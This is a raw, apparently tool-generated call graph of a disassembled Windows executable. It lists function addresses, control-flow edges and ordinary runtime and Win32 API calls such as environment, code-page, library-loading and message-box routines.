7ff6029b1215 16197->16202 16206 7ff6029a97c8 __free_lconv_mon 11 API calls 16197->16206 16198 7ff6029b11ba 16199 7ff6029a4144 _set_fmode 11 API calls 16198->16199 16200 7ff6029b11bf 16199->16200 16201 7ff6029a97c8 __free_lconv_mon 11 API calls 16200->16201 16201->16205 16203 7ff6029b127c 16202->16203 16241 7ff6029b0b74 16202->16241 16204 7ff6029a97c8 __free_lconv_mon 11 API calls 16203->16204 16204->16205 16205->16121 16206->16202 16209 7ff6029b12d7 16208->16209 16210 7ff6029b12e1 16209->16210 16256 7ff6029af158 EnterCriticalSection 16209->16256 16212 7ff6029b1353 16210->16212 16215 7ff6029a9384 __CxxCallCatchBlock 45 API calls 16210->16215 16212->16187 16216 7ff6029b136b 16215->16216 16218 7ff6029b13c2 16216->16218 16220 7ff6029aa0a4 50 API calls 16216->16220 16218->16187 16221 7ff6029b13ac 16220->16221 16222 7ff6029b1044 65 API calls 16221->16222 16222->16218 16257 7ff6029a3ec8 16223->16257 16226 7ff6029b0d64 GetOEMCP 16228 7ff6029b0d8b 16226->16228 16227 7ff6029b0d76 16227->16228 16229 7ff6029b0d7b GetACP 16227->16229 16228->16190 16228->16205 16229->16228 16231 7ff6029b0d44 47 API calls 16230->16231 16232 7ff6029b1419 16231->16232 16233 7ff6029b156f 16232->16233 16235 7ff6029b1456 IsValidCodePage 16232->16235 16240 7ff6029b1470 memcpy_s 16232->16240 16234 7ff60299b5c0 _log10_special 8 API calls 16233->16234 16236 7ff6029b11b1 16234->16236 16235->16233 16237 7ff6029b1467 16235->16237 16236->16197 16236->16198 16238 7ff6029b1496 GetCPInfo 16237->16238 16237->16240 16238->16233 16238->16240 16289 7ff6029b0e5c 16240->16289 16376 7ff6029af158 EnterCriticalSection 16241->16376 16258 7ff6029a3ee7 16257->16258 16259 7ff6029a3eec 16257->16259 16258->16226 16258->16227 16259->16258 16260 7ff6029a9fd0 __CxxCallCatchBlock 45 API calls 16259->16260 16261 7ff6029a3f07 16260->16261 16265 7ff6029ac804 16261->16265 16266 7ff6029ac819 16265->16266 16268 7ff6029a3f2a 16265->16268 16266->16268 16273 7ff6029b2084 16266->16273 16269 7ff6029ac870 16268->16269 16270 7ff6029ac885 16269->16270 16271 7ff6029ac898 16269->16271 16270->16271 16286 7ff6029b13d0 16270->16286 16271->16258 16274 7ff6029a9fd0 __CxxCallCatchBlock 45 API calls 16273->16274 16275 7ff6029b2093 16274->16275 16276 7ff6029b20de 16275->16276 16285 7ff6029af158 EnterCriticalSection 16275->16285 16276->16268 16287 7ff6029a9fd0 __CxxCallCatchBlock 45 API calls 16286->16287 16288 7ff6029b13d9 16287->16288 16290 7ff6029b0e99 GetCPInfo 16289->16290 16291 7ff6029b0f8f 16289->16291 16290->16291 16296 7ff6029b0eac 16290->16296 16292 7ff60299b5c0 _log10_special 8 API calls 16291->16292 16294 7ff6029b102e 16292->16294 16294->16233 16300 7ff6029b1bc0 16296->16300 16301 7ff6029a3ec8 45 API calls 16300->16301 16302 7ff6029b1c02 16301->16302 16320 7ff6029ae720 16302->16320 16322 7ff6029ae729 MultiByteToWideChar 16320->16322 16378 7ff6029a81c9 16377->16378 16379 7ff6029a832d 16377->16379 16378->16160 16380 7ff6029a8356 16379->16380 16382 7ff6029a97c8 __free_lconv_mon 11 API calls 16379->16382 16381 7ff6029a97c8 __free_lconv_mon 11 API calls 16380->16381 16381->16378 16382->16379 16384 7ff6029b5340 16383->16384 16385 7ff6029b5329 16383->16385 16384->16385 16388 7ff6029b534e 16384->16388 16386 7ff6029a4144 _set_fmode 11 API calls 16385->16386 16387 7ff6029b532e 16386->16387 16389 7ff6029a9760 _invalid_parameter_noinfo 37 API calls 16387->16389 16390 7ff6029a3ec8 45 API calls 16388->16390 16391 7ff6029b5339 16388->16391 16389->16391 16390->16391 16391->15979 16393 7ff6029a3ec8 45 API calls 16392->16393 16394 7ff6029b7fd9 16393->16394 16397 7ff6029b7c30 16394->16397 16401 7ff6029b7c7e 16397->16401 16398 7ff60299b5c0 _log10_special 8 API calls 16399 7ff6029b61e5 16398->16399 16399->15979 16399->16004 16400 7ff6029b7d05 16402 7ff6029ae720 _fread_nolock MultiByteToWideChar 16400->16402 16406 7ff6029b7d09 16400->16406 16401->16400 16403 7ff6029b7cf0 GetCPInfo 16401->16403 16401->16406 16404 7ff6029b7d9d 16402->16404 16403->16400 16403->16406 16405 7ff6029ac47c _fread_nolock 12 API calls 16404->16405 16404->16406 16407 7ff6029b7dd4 16404->16407 16405->16407 16406->16398 16407->16406 16408 7ff6029ae720 _fread_nolock MultiByteToWideChar 16407->16408 16409 7ff6029b7e42 16408->16409 16410 7ff6029b7f24 16409->16410 16411 7ff6029ae720 _fread_nolock MultiByteToWideChar 16409->16411 16410->16406 16412 7ff6029a97c8 __free_lconv_mon 11 API calls 16410->16412 16413 7ff6029b7e68 16411->16413 16412->16406 16413->16410 16414 7ff6029ac47c _fread_nolock 12 API calls 16413->16414 16415 7ff6029b7e95 16413->16415 16414->16415 16415->16410 16416 7ff6029ae720 _fread_nolock MultiByteToWideChar 16415->16416 16417 7ff6029b7f0c 16416->16417 16418 7ff6029b7f12 16417->16418 16419 7ff6029b7f2c 16417->16419 16418->16410 16422 7ff6029a97c8 __free_lconv_mon 11 API calls 16418->16422 16426 7ff6029adde8 16419->16426 16422->16410 16423 7ff6029b7f6b 16423->16406 16425 7ff6029a97c8 __free_lconv_mon 11 API calls 16423->16425 16424 7ff6029a97c8 __free_lconv_mon 11 API calls 16424->16423 16425->16406 16427 7ff6029adb90 __crtLCMapStringW 5 API calls 16426->16427 16428 7ff6029ade26 16427->16428 16429 7ff6029ade2e 16428->16429 16430 7ff6029ae050 __crtLCMapStringW 5 API calls 16428->16430 16429->16423 16429->16424 16431 7ff6029ade97 CompareStringW 16430->16431 16431->16429 16433 7ff6029adb90 __crtLCMapStringW 5 API calls 16432->16433 16434 7ff6029addc4 16433->16434 16434->16008 16436 7ff6029a4536 16435->16436 16437 7ff6029a455a 16435->16437 16441 7ff6029a97c8 __free_lconv_mon 11 API calls 16436->16441 16456 7ff6029a4545 16436->16456 16438 7ff6029a455f 16437->16438 16439 7ff6029a45b4 16437->16439 16442 7ff6029a4574 16438->16442 16444 7ff6029a97c8 __free_lconv_mon 11 API calls 16438->16444 16438->16456 16440 7ff6029ae720 _fread_nolock MultiByteToWideChar 16439->16440 16451 7ff6029a45d0 16440->16451 16441->16456 16445 7ff6029ac47c _fread_nolock 12 API calls 16442->16445 16443 7ff6029a45d7 GetLastError 16457 7ff6029a40b8 16443->16457 16444->16442 16445->16456 16447 7ff6029a4612 16448 7ff6029ae720 _fread_nolock MultiByteToWideChar 16447->16448 16447->16456 16452 7ff6029a4656 16448->16452 16450 7ff6029a4605 16455 7ff6029ac47c _fread_nolock 12 API calls 16450->16455 16451->16443 16451->16447 16451->16450 16454 7ff6029a97c8 __free_lconv_mon 11 API calls 16451->16454 16452->16443 16452->16456 16453 7ff6029a4144 _set_fmode 11 API calls 16453->16456 16454->16450 16455->16447 16456->16012 16456->16013 16458 7ff6029aa148 _set_fmode 11 API calls 16457->16458 16459 7ff6029a40c5 __free_lconv_mon 16458->16459 16460 7ff6029aa148 _set_fmode 11 API calls 16459->16460 16461 7ff6029a40e7 16460->16461 16461->16453 16463 7ff6029a80a1 16462->16463 16464 7ff6029a80a5 16462->16464 16463->16044 16475 7ff6029a844c 16463->16475 16483 7ff6029b17bc GetEnvironmentStringsW 16464->16483 16467 7ff6029a80be 16490 7ff6029a820c 16467->16490 16468 7ff6029a80b2 16469 7ff6029a97c8 __free_lconv_mon 11 API calls 16468->16469 16469->16463 16472 7ff6029a97c8 __free_lconv_mon 11 API calls 16473 7ff6029a80e5 16472->16473 16474 7ff6029a97c8 __free_lconv_mon 11 API calls 16473->16474 16474->16463 16476 7ff6029a846f 16475->16476 16481 7ff6029a8486 16475->16481 16476->16044 16477 7ff6029ada18 _set_fmode 11 API calls 16477->16481 16478 7ff6029a84fa 16480 7ff6029a97c8 __free_lconv_mon 11 API calls 16478->16480 16479 7ff6029ae720 MultiByteToWideChar _fread_nolock 16479->16481 16480->16476 16481->16476 16481->16477 16481->16478 16481->16479 16482 7ff6029a97c8 __free_lconv_mon 11 API calls 16481->16482 16482->16481 16484 7ff6029b17e0 16483->16484 16485 7ff6029a80aa 16483->16485 16486 7ff6029ac47c _fread_nolock 12 API calls 16484->16486 16485->16467 16485->16468 16487 7ff6029b1817 memcpy_s 16486->16487 16488 7ff6029a97c8 __free_lconv_mon 11 API calls 16487->16488 16489 7ff6029b1837 FreeEnvironmentStringsW 16488->16489 16489->16485 16491 7ff6029a8234 16490->16491 16492 7ff6029ada18 _set_fmode 11 API calls 16491->16492 16503 7ff6029a826f 16492->16503 16493 7ff6029a8277 16494 7ff6029a97c8 __free_lconv_mon 11 API calls 16493->16494 16496 7ff6029a80c6 16494->16496 16495 7ff6029a82f1 16497 7ff6029a97c8 __free_lconv_mon 11 API calls 16495->16497 16496->16472 16497->16496 16498 7ff6029ada18 _set_fmode 11 API calls 16498->16503 16499 7ff6029a82e0 16501 7ff6029a8328 11 API calls 16499->16501 16500 7ff6029af2f4 37 API calls 16500->16503 16502 7ff6029a82e8 16501->16502 16505 7ff6029a97c8 __free_lconv_mon 11 API calls 16502->16505 16503->16493 16503->16495 16503->16498 16503->16499 16503->16500 16504 7ff6029a8314 16503->16504 16507 7ff6029a97c8 __free_lconv_mon 11 API calls 16503->16507 16506 7ff6029a9780 _isindst 17 API calls 16504->16506 16505->16493 16508 7ff6029a8326 16506->16508 16507->16503 16510 7ff6029b7b99 __crtLCMapStringW 16509->16510 16511 7ff6029b60ce 16510->16511 16512 7ff6029adde8 6 API calls 16510->16512 16511->16067 16511->16068 16512->16511 19383 7ff6029b9dc9 19386 7ff6029a44d8 LeaveCriticalSection 19383->19386 20022 7ff6029ab3a0 20033 7ff6029af158 EnterCriticalSection 20022->20033 19407 7ff6029b0430 19418 7ff6029b63c4 19407->19418 19420 7ff6029b63d1 19418->19420 19419 7ff6029a97c8 __free_lconv_mon 11 API calls 19419->19420 19420->19419 19421 7ff6029b63ed 19420->19421 19422 7ff6029a97c8 __free_lconv_mon 11 API calls 19421->19422 19423 7ff6029b0439 19421->19423 19422->19421 19424 7ff6029af158 EnterCriticalSection 19423->19424 16777 7ff60299bcac 16798 7ff60299be7c 16777->16798 16780 7ff60299bdf8 16917 7ff60299c19c IsProcessorFeaturePresent 16780->16917 16781 7ff60299bcc8 __scrt_acquire_startup_lock 16783 7ff60299be02 16781->16783 16790 7ff60299bce6 __scrt_release_startup_lock 16781->16790 16784 7ff60299c19c 7 API calls 16783->16784 16786 7ff60299be0d __CxxCallCatchBlock 16784->16786 16785 7ff60299bd0b 16787 7ff60299bd91 16804 7ff60299c2e4 16787->16804 16789 7ff60299bd96 16807 7ff602991000 16789->16807 16790->16785 16790->16787 16906 7ff6029a89ac 16790->16906 16795 7ff60299bdb9 16795->16786 16913 7ff60299c000 16795->16913 16799 7ff60299be84 16798->16799 16800 7ff60299be90 __scrt_dllmain_crt_thread_attach 16799->16800 16801 7ff60299bcc0 16800->16801 16802 7ff60299be9d 16800->16802 16801->16780 16801->16781 16802->16801 16924 7ff60299c8f8 16802->16924 16805 7ff6029b9530 memcpy_s 16804->16805 16806 7ff60299c2fb GetStartupInfoW 16805->16806 16806->16789 16808 7ff602991009 16807->16808 16951 7ff6029a44e4 16808->16951 16810 7ff60299352b 16958 7ff6029933e0 16810->16958 16814 7ff60299b5c0 _log10_special 8 API calls 16816 7ff60299372a 16814->16816 16911 7ff60299c328 GetModuleHandleW 16816->16911 16817 7ff602993736 17149 7ff602993f50 16817->17149 16818 7ff60299356c 16820 7ff602991bf0 49 API calls 16818->16820 16834 7ff602993588 16820->16834 16822 7ff602993785 16823 7ff6029925f0 53 API calls 16822->16823 16905 7ff602993538 16823->16905 16826 7ff60299365f __vcrt_freefls 16831 7ff602993834 16826->16831 16835 7ff602997d60 14 API calls 16826->16835 16827 7ff602993778 16828 7ff60299379f 16827->16828 16829 7ff60299377d 16827->16829 16830 7ff602991bf0 49 API calls 16828->16830 17168 7ff60299f0bc 16829->17168 16833 7ff6029937be 16830->16833 16858 7ff602993805 __vcrt_freefls 16831->16858 17172 7ff602993e70 16831->17172 16843 7ff6029918f0 115 API calls 16833->16843 17020 7ff602997d60 16834->17020 16837 7ff6029936ae 16835->16837 17033 7ff602997ed0 16837->17033 16838 7ff602993852 16840 7ff602993871 16838->16840 16841 7ff602993865 16838->16841 16842 7ff602991bf0 49 API calls 16840->16842 17175 7ff602993fc0 16841->17175 16842->16858 16846 7ff6029937df 16843->16846 16844 7ff6029936bd 16847 7ff60299380f 16844->16847 16851 7ff6029936cf 16844->16851 16846->16834 16850 7ff6029937ef 16846->16850 17042 7ff602998160 16847->17042 16854 7ff6029925f0 53 API calls 16850->16854 17038 7ff602991bf0 16851->17038 16853 7ff60299389e SetDllDirectoryW 16861 7ff6029938c3 16853->16861 16854->16905 17093 7ff602998410 16858->17093 16859 7ff6029936fc 17138 7ff6029925f0 16859->17138 16863 7ff602993a38 16861->16863 17098 7ff602996530 16861->17098 16866 7ff602993a42 PostMessageW GetMessageW 16863->16866 16867 7ff602993a65 16863->16867 16866->16867 17232 7ff602993080 16867->17232 16869 7ff6029938ea 16871 7ff602993947 16869->16871 16873 7ff602993901 16869->16873 17178 7ff602996570 16869->17178 16871->16863 16877 7ff60299395c 16871->16877 16885 7ff602993905 16873->16885 17199 7ff602996910 16873->17199 17118 7ff6029930e0 16877->17118 16881 7ff602996750 FreeLibrary 16884 7ff602993a8b 16881->16884 16885->16871 17215 7ff602992870 16885->17215 16905->16814 16907 7ff6029a89e4 16906->16907 16908 7ff6029a89c3 16906->16908 16909 7ff6029a9258 45 API calls 16907->16909 16908->16787 16910 7ff6029a89e9 16909->16910 16912 7ff60299c339 16911->16912 16912->16795 16914 7ff60299c011 16913->16914 16915 7ff60299bdd0 16914->16915 16916 7ff60299c8f8 7 API calls 16914->16916 16915->16785 16916->16915 16918 7ff60299c1c2 _isindst memcpy_s 16917->16918 16919 7ff60299c1e1 RtlCaptureContext RtlLookupFunctionEntry 16918->16919 16920 7ff60299c246 memcpy_s 16919->16920 16921 7ff60299c20a RtlVirtualUnwind 16919->16921 16922 7ff60299c278 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 16920->16922 16921->16920 16923 7ff60299c2c6 _isindst 16922->16923 16923->16783 16925 7ff60299c900 16924->16925 16926 7ff60299c90a 16924->16926 16930 7ff60299cc94 16925->16930 16926->16801 16931 7ff60299c905 16930->16931 16932 7ff60299cca3 16930->16932 16934 7ff60299cd00 16931->16934 16938 7ff60299ced0 16932->16938 16935 7ff60299cd2b 16934->16935 16936 7ff60299cd2f 16935->16936 16937 7ff60299cd0e DeleteCriticalSection 16935->16937 16936->16926 16937->16935 16942 7ff60299cd38 16938->16942 16948 7ff60299ce22 TlsFree 16942->16948 16949 7ff60299cd7c __vcrt_InitializeCriticalSectionEx 16942->16949 16943 7ff60299cdaa LoadLibraryExW 16945 7ff60299ce49 16943->16945 16946 7ff60299cdcb GetLastError 16943->16946 16944 7ff60299ce69 GetProcAddress 16944->16948 16945->16944 16947 7ff60299ce60 FreeLibrary 16945->16947 16946->16949 16947->16944 16949->16943 16949->16944 16949->16948 16950 7ff60299cded LoadLibraryExW 16949->16950 16950->16945 16950->16949 16952 7ff6029ae300 16951->16952 16954 7ff6029ae3a6 16952->16954 16955 7ff6029ae353 16952->16955 16953 7ff6029a9694 _invalid_parameter_noinfo 37 API calls 16957 7ff6029ae37c 16953->16957 17245 7ff6029ae1d8 16954->17245 16955->16953 16957->16810 17253 7ff60299b8c0 16958->17253 16961 7ff602993438 17255 7ff602998300 FindFirstFileExW 16961->17255 16962 7ff60299341b 17260 7ff6029929e0 16962->17260 16966 7ff6029934a5 17279 7ff6029984c0 16966->17279 16967 7ff60299344b 17270 7ff602998380 CreateFileW 16967->17270 16969 7ff60299b5c0 _log10_special 8 API calls 16971 7ff6029934dd 16969->16971 16971->16905 16980 7ff6029918f0 16971->16980 16973 7ff6029934b3 16974 7ff60299342e 16973->16974 16977 7ff6029926c0 49 API calls 16973->16977 16974->16969 16975 7ff602993474 __vcrt_InitializeCriticalSectionEx 16975->16966 16976 7ff60299345c 17273 7ff6029926c0 16976->17273 16977->16974 16981 7ff602993f50 108 API calls 16980->16981 16982 7ff602991925 16981->16982 16983 7ff602991bb6 16982->16983 16984 7ff6029975f0 83 API calls 16982->16984 16985 7ff60299b5c0 _log10_special 8 API calls 16983->16985 16986 7ff60299196b 16984->16986 16987 7ff602991bd1 16985->16987 17019 7ff60299199c 16986->17019 17624 7ff60299f744 16986->17624 16987->16817 16987->16818 16989 7ff60299f0bc 74 API calls 16989->16983 16990 7ff602991985 16991 7ff6029919a1 16990->16991 16992 7ff602991989 16990->16992 17628 7ff60299f40c 16991->17628 17631 7ff602992760 16992->17631 16996 7ff6029919bf 16998 7ff602992760 53 API calls 16996->16998 16997 7ff6029919d7 16999 7ff6029919ee 16997->16999 17000 7ff602991a06 16997->17000 16998->17019 17001 7ff602992760 53 API calls 16999->17001 17002 7ff602991bf0 49 API calls 17000->17002 17001->17019 17003 7ff602991a1d 17002->17003 17004 7ff602991bf0 49 API calls 17003->17004 17005 7ff602991a68 17004->17005 17006 7ff60299f744 73 API calls 17005->17006 17007 7ff602991a8c 17006->17007 17008 7ff602991aa1 17007->17008 17009 7ff602991ab9 17007->17009 17010 7ff602992760 53 API calls 17008->17010 17011 7ff60299f40c _fread_nolock 53 API calls 17009->17011 17010->17019 17012 7ff602991ace 17011->17012 17013 7ff602991ad4 17012->17013 17014 7ff602991aec 17012->17014 17015 7ff602992760 53 API calls 17013->17015 17648 7ff60299f180 17014->17648 17015->17019 17018 7ff6029925f0 53 API calls 17018->17019 17019->16989 17021 7ff602997d6a 17020->17021 17022 7ff602998410 2 API calls 17021->17022 17023 7ff602997d89 GetEnvironmentVariableW 17022->17023 17024 7ff602997df2 17023->17024 17025 7ff602997da6 ExpandEnvironmentStringsW 17023->17025 17026 7ff60299b5c0 _log10_special 8 API calls 17024->17026 17025->17024 17027 7ff602997dc8 17025->17027 17028 7ff602997e04 17026->17028 17029 7ff6029984c0 2 API calls 17027->17029 17028->16826 17030 7ff602997dda 17029->17030 17031 7ff60299b5c0 _log10_special 8 API calls 17030->17031 17032 7ff602997dea 17031->17032 17032->16826 17034 7ff602998410 2 API calls 17033->17034 17035 7ff602997ee4 17034->17035 17854 7ff6029a70b0 17035->17854 17037 7ff602997ef6 __vcrt_freefls 17037->16844 17039 7ff602991c15 17038->17039 17040 7ff6029a39f4 49 API calls 17039->17040 17041 7ff602991c38 17040->17041 17041->16858 17041->16859 17043 7ff602998175 17042->17043 17872 7ff602997aa0 GetCurrentProcess OpenProcessToken 17043->17872 17046 7ff602997aa0 7 API calls 17047 7ff6029981a1 17046->17047 17048 7ff6029981d4 17047->17048 17049 7ff6029981ba 17047->17049 17051 7ff602992590 48 API calls 17048->17051 17050 7ff602992590 48 API calls 17049->17050 17052 7ff6029981d2 17050->17052 17053 7ff6029981e7 LocalFree LocalFree 17051->17053 17052->17053 17054 7ff602998203 17053->17054 17056 7ff60299820f 17053->17056 17882 7ff602992940 17054->17882 17057 7ff60299b5c0 _log10_special 8 API calls 17056->17057 17058 7ff602993814 17057->17058 17094 7ff602998456 17093->17094 17095 7ff602998432 MultiByteToWideChar 17093->17095 17096 7ff602998473 MultiByteToWideChar 17094->17096 17097 7ff60299846c __vcrt_freefls 17094->17097 17095->17094 17095->17097 17096->17097 17097->16853 17099 7ff602996545 17098->17099 17100 7ff6029938d5 17099->17100 17101 7ff602992760 53 API calls 17099->17101 17102 7ff602996aa0 17100->17102 17101->17100 17103 7ff602996ad0 17102->17103 17112 7ff602996aea __vcrt_freefls 17102->17112 17103->17112 18057 7ff602991440 17103->18057 17105 7ff602996af4 17106 7ff602993fc0 49 API calls 17105->17106 17105->17112 17107 7ff602996b16 17106->17107 17108 7ff602996b1b 17107->17108 17109 7ff602993fc0 49 API calls 17107->17109 17111 7ff602992870 53 API calls 17108->17111 17110 7ff602996b3a 17109->17110 17110->17108 17113 7ff602993fc0 49 API calls 17110->17113 17111->17112 17112->16869 17114 7ff602996b56 17113->17114 17114->17108 17115 7ff602996b5f 17114->17115 17116 7ff6029925f0 53 API calls 17115->17116 17117 7ff602996bcf memcpy_s __vcrt_freefls 17115->17117 17116->17112 17117->16869 17130 7ff6029930ee memcpy_s 17118->17130 17119 7ff60299b5c0 _log10_special 8 API calls 17120 7ff60299338e 17119->17120 17120->16905 17137 7ff602998140 LocalFree 17120->17137 17121 7ff6029932e7 17121->17119 17123 7ff602991bf0 49 API calls 17123->17130 17124 7ff602993309 17126 7ff6029925f0 53 API calls 17124->17126 17126->17121 17129 7ff6029932e9 17132 7ff6029925f0 53 API calls 17129->17132 17130->17121 17130->17123 17130->17124 17130->17129 17131 7ff602992870 53 API calls 17130->17131 17135 7ff6029932f7 17130->17135 18118 7ff602993ef0 17130->18118 18124 7ff602997480 17130->18124 18135 7ff6029915c0 17130->18135 18173 7ff602996880 17130->18173 18177 7ff602993b20 17130->18177 18221 7ff602993de0 17130->18221 17131->17130 17132->17121 17136 7ff6029925f0 53 API calls 17135->17136 17136->17121 17139 7ff60299262a 17138->17139 17140 7ff6029a39f4 49 API calls 17139->17140 17141 7ff602992652 17140->17141 17142 7ff602998410 2 API calls 17141->17142 17143 7ff60299266a 17142->17143 17144 7ff60299268e MessageBoxA 17143->17144 17145 7ff602992677 MessageBoxW 17143->17145 17150 7ff602993f5c 17149->17150 17151 7ff602998410 2 API calls 17150->17151 17152 7ff602993f84 17151->17152 17153 7ff602998410 2 API calls 17152->17153 17154 7ff602993f97 17153->17154 18341 7ff6029a4ff4 17154->18341 17157 7ff60299b5c0 _log10_special 8 API calls 17158 7ff602993746 17157->17158 17158->16822 17159 7ff6029975f0 17158->17159 17160 7ff602997614 17159->17160 17161 7ff60299f744 73 API calls 17160->17161 17166 7ff6029976eb __vcrt_freefls 17160->17166 17162 7ff602997630 17161->17162 17162->17166 18732 7ff6029a6928 17162->18732 17164 7ff60299f744 73 API calls 17167 7ff602997645 17164->17167 17165 7ff60299f40c _fread_nolock 53 API calls 17165->17167 17166->16827 17167->17164 17167->17165 17167->17166 17169 7ff60299f0ec 17168->17169 18747 7ff60299ee98 17169->18747 17171 7ff60299f105 17171->16822 17173 7ff602991bf0 49 API calls 17172->17173 17174 7ff602993e8d 17173->17174 17174->16838 17176 7ff602991bf0 49 API calls 17175->17176 17177 7ff602993ff0 17176->17177 17177->16858 17188 7ff60299658c 17178->17188 17179 7ff60299b5c0 _log10_special 8 API calls 17181 7ff6029966c1 17179->17181 17180 7ff6029917e0 45 API calls 17180->17188 17181->16873 17182 7ff60299672d 17184 7ff6029925f0 53 API calls 17182->17184 17183 7ff602991bf0 49 API calls 17183->17188 17194 7ff6029966af 17184->17194 17185 7ff60299671a 17186 7ff6029925f0 53 API calls 17185->17186 17186->17194 17187 7ff602993ef0 10 API calls 17187->17188 17188->17180 17188->17182 17188->17183 17188->17185 17188->17187 17189 7ff6029966dd 17188->17189 17190 7ff602997480 52 API calls 17188->17190 17192 7ff602992870 53 API calls 17188->17192 17193 7ff602996707 17188->17193 17188->17194 17196 7ff6029915c0 118 API calls 17188->17196 17197 7ff6029966f0 17188->17197 17191 7ff6029925f0 53 API calls 17189->17191 17190->17188 17191->17194 17192->17188 17195 7ff6029925f0 53 API calls 17193->17195 17194->17179 17195->17194 17196->17188 17198 7ff6029925f0 53 API calls 17197->17198 17198->17194 18758 7ff6029980f0 17199->18758 17201 7ff602996929 17202 7ff6029980f0 3 API calls 17201->17202 17203 7ff60299693c 17202->17203 17204 7ff60299696f 17203->17204 17205 7ff602996954 17203->17205 17206 7ff6029925f0 53 API calls 17204->17206 18762 7ff602996e40 GetProcAddress 17205->18762 17208 7ff602993916 17206->17208 17208->16885 17209 7ff602996c70 17208->17209 17216 7ff6029928aa 17215->17216 17217 7ff6029a39f4 49 API calls 17216->17217 17218 7ff6029928d2 17217->17218 17219 7ff602998410 2 API calls 17218->17219 17220 7ff6029928ea 17219->17220 17221 7ff60299290e MessageBoxA 17220->17221 17222 7ff6029928f7 MessageBoxW 17220->17222 17223 7ff602992920 17221->17223 17222->17223 17224 7ff60299b5c0 _log10_special 8 API calls 17223->17224 17225 7ff602992930 17224->17225 17226 7ff602996750 17225->17226 17230 7ff602996793 17226->17230 17231 7ff602996762 17226->17231 17230->16871 17231->17230 18823 7ff602995ad0 17232->18823 17240 7ff6029930b9 17241 7ff6029933a0 17240->17241 17242 7ff6029933ae 17241->17242 17243 7ff6029933bf 17242->17243 19096 7ff6029980d0 FreeLibrary 17242->19096 17243->16881 17252 7ff6029a44cc EnterCriticalSection 17245->17252 17254 7ff6029933ec GetModuleFileNameW 17253->17254 17254->16961 17254->16962 17256 7ff60299833f FindClose 17255->17256 17257 7ff602998352 17255->17257 17256->17257 17258 7ff60299b5c0 _log10_special 8 API calls 17257->17258 17259 7ff602993442 17258->17259 17259->16966 17259->16967 17261 7ff60299b8c0 17260->17261 17262 7ff6029929fc GetLastError 17261->17262 17263 7ff602992a29 17262->17263 17284 7ff6029a3c48 17263->17284 17268 7ff60299b5c0 _log10_special 8 API calls 17269 7ff602992ae5 17268->17269 17269->16974 17271 7ff6029983c0 GetFinalPathNameByHandleW CloseHandle 17270->17271 17272 7ff602993458 17270->17272 17271->17272 17272->16975 17272->16976 17274 7ff6029926fa 17273->17274 17275 7ff6029a3c48 48 API calls 17274->17275 17276 7ff602992722 MessageBoxW 17275->17276 17277 7ff60299b5c0 _log10_special 8 API calls 17276->17277 17278 7ff60299274c 17277->17278 17278->16974 17280 7ff6029984ea WideCharToMultiByte 17279->17280 17282 7ff602998515 17279->17282 17280->17282 17283 7ff60299852b __vcrt_freefls 17280->17283 17281 7ff602998532 WideCharToMultiByte 17281->17283 17282->17281 17282->17283 17283->16973 17286 7ff6029a3ca2 17284->17286 17285 7ff6029a3cc7 17287 7ff6029a9694 _invalid_parameter_noinfo 37 API calls 17285->17287 17286->17285 17288 7ff6029a3d03 17286->17288 17291 7ff6029a3cf1 17287->17291 17306 7ff6029a2000 17288->17306 17292 7ff60299b5c0 _log10_special 8 API calls 17291->17292 17294 7ff602992a54 FormatMessageW 17292->17294 17293 7ff6029a97c8 __free_lconv_mon 11 API calls 17293->17291 17302 7ff602992590 17294->17302 17295 7ff6029a3de4 17295->17293 17296 7ff6029a3db9 17299 7ff6029a97c8 __free_lconv_mon 11 API calls 17296->17299 17297 7ff6029a3e0a 17297->17295 17298 7ff6029a3e14 17297->17298 17301 7ff6029a97c8 __free_lconv_mon 11 API calls 17298->17301 17299->17291 17300 7ff6029a3db0 17300->17295 17300->17296 17301->17291 17303 7ff6029925b5 17302->17303 17304 7ff6029a3c48 48 API calls 17303->17304 17305 7ff6029925d8 MessageBoxW 17304->17305 17305->17268 17307 7ff6029a203e 17306->17307 17308 7ff6029a202e 17306->17308 17309 7ff6029a2047 17307->17309 17313 7ff6029a2075 17307->17313 17312 7ff6029a9694 _invalid_parameter_noinfo 37 API calls 17308->17312 17310 7ff6029a9694 _invalid_parameter_noinfo 37 API calls 17309->17310 17311 7ff6029a206d 17310->17311 17311->17295 17311->17296 17311->17297 17311->17300 17312->17311 17313->17308 17313->17311 17317 7ff6029a2a14 17313->17317 17350 7ff6029a2460 17313->17350 17387 7ff6029a1bf0 17313->17387 17318 7ff6029a2ac7 17317->17318 17319 7ff6029a2a56 17317->17319 17322 7ff6029a2b20 17318->17322 17323 7ff6029a2acc 17318->17323 17320 7ff6029a2af1 17319->17320 17321 7ff6029a2a5c 17319->17321 17410 7ff6029a0dc4 17320->17410 17326 7ff6029a2a61 17321->17326 17327 7ff6029a2a90 17321->17327 17329 7ff6029a2b37 17322->17329 17330 7ff6029a2b2a 17322->17330 17334 7ff6029a2b2f 17322->17334 17324 7ff6029a2ace 17323->17324 17325 7ff6029a2b01 17323->17325 17328 7ff6029a2a70 17324->17328 17337 7ff6029a2add 17324->17337 17417 7ff6029a09b4 17325->17417 17326->17329 17332 7ff6029a2a67 17326->17332 17327->17332 17327->17334 17348 7ff6029a2b60 17328->17348 17390 7ff6029a31c8 17328->17390 17424 7ff6029a371c 17329->17424 17330->17320 17330->17334 17332->17328 17338 7ff6029a2aa2 17332->17338 17345 7ff6029a2a8b 17332->17345 17334->17348 17428 7ff6029a11d4 17334->17428 17337->17320 17340 7ff6029a2ae2 17337->17340 17338->17348 17400 7ff6029a3504 17338->17400 17340->17348 17406 7ff6029a35c8 17340->17406 17342 7ff60299b5c0 _log10_special 8 API calls 17344 7ff6029a2e5a 17342->17344 17344->17313 17345->17348 17349 7ff6029a2d4c 17345->17349 17435 7ff6029a3830 17345->17435 17348->17342 17349->17348 17441 7ff6029ad888 17349->17441 17351 7ff6029a246e 17350->17351 17352 7ff6029a2484 17350->17352 17353 7ff6029a2ac7 17351->17353 17354 7ff6029a2a56 17351->17354 17356 7ff6029a24c4 17351->17356 17355 7ff6029a9694 _invalid_parameter_noinfo 37 API calls 17352->17355 17352->17356 17359 7ff6029a2b20 17353->17359 17360 7ff6029a2acc 17353->17360 17357 7ff6029a2af1 17354->17357 17358 7ff6029a2a5c 17354->17358 17355->17356 17356->17313 17368 7ff6029a0dc4 38 API calls 17357->17368 17363 7ff6029a2a61 17358->17363 17364 7ff6029a2a90 17358->17364 17366 7ff6029a2b37 17359->17366 17367 7ff6029a2b2a 17359->17367 17371 7ff6029a2b2f 17359->17371 17361 7ff6029a2ace 17360->17361 17362 7ff6029a2b01 17360->17362 17365 